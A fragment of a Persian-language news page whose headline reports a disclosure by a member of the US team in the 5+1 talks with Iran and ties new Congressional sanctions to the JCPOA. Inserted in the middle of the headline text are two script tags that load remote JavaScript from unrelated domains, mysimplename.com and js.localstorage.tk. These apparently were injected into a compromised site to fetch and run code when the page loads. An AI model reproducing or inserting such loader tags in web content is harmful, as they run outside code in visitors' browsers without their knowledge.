افشاگری یکی از اعضای تیم آمریکایی در گفتگوهای 5+1 با ایران


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>افشاگری یکی از اعضای تیم آمریکایی در گفتگوهای 5+1 با طرف های ایرانی و ارتباط تحریم های جدید کنگره ی آمریکا با برجام<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر